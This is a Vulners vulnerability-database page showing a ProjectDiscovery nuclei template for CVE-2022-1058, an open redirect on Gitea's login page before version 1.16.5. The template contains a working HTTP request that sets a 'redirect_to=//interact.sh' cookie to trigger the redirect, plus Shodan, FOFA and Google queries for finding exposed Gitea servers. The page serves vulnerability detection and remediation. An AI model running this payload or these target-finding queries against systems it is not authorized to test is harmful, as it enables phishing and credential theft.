Lucene search
K

Gitea <1.16.5 - Open Redirect

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 47 Views

Gitea <1.16.5 - Open Redirect vulnerability - Allows for open redirect via GitHub repository, potential theft of sensitive informatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Huntr
Open Redirect on login
23 Mar 202211:11
huntr
Huntr
Open Redirect on follow/unfollow user's profile action
7 Jun 202307:33
huntr
FreeBSD
gitea -- Open Redirect on login
23 Mar 202200:00
freebsd
ATTACKERKB
CVE-2022-1058
24 Mar 202215:15
attackerkb
Circl
CVE-2022-1058
24 Mar 202217:29
circl
CNNVD
Gitea 输入验证错误漏洞
24 Mar 202200:00
cnnvd
CVE
CVE-2022-1058
24 Mar 202214:15
cve
Cvelist
CVE-2022-1058 Open Redirect on login in go-gitea/gitea
24 Mar 202214:15
cvelist
EUVD
EUVD-2022-1315
24 Mar 202214:15
euvd
Tenable Nessus
FreeBSD : gitea -- Open Redirect on login (83466f76-aefe-11ec-b4b6-d05099c0c059)
29 Mar 202200:00
nessus
Rows per page
id: CVE-2022-1058

info:
  name: Gitea <1.16.5 - Open Redirect
  author: theamanrawat
  severity: medium
  description: |
    Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
  remediation: |
    Upgrade Gitea to version 1.16.5 or later to fix the open redirect vulnerability.
  reference:
    - https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48
    - https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1058
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1058
    cwe-id: CWE-601
    epss-score: 0.53177
    epss-percentile: 0.9885
    cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: gitea
    product: gitea
    shodan-query:
      - title:"Gitea"
      - http.html:"powered by gitea version"
      - http.title:"gitea"
      - cpe:"cpe:2.3:a:gitea:gitea"
    fofa-query:
      - body="powered by gitea version"
      - title="gitea"
    google-query: intitle:"gitea"
  tags: cve,cve2022,huntr,open-redirect,gitea,vuln

http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: redirect_to=//interact.sh

        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_2
        words:
          - "//interact.sh"

      - type: status
        status:
          - 302

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="(.*)"'
        internal: true
# digest: 4b0a0048304602210095372a50c4b8f39adad47c2babb72627e8d76493fc66dd7d7155eaf0979bc902022100aaa17152b67e40bdf71b1ec0f5af9530191b03af190631545ce409432a74b3c3:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 25.8
CVSS 3.16.1
CVSS 37.2
EPSS0.53177
47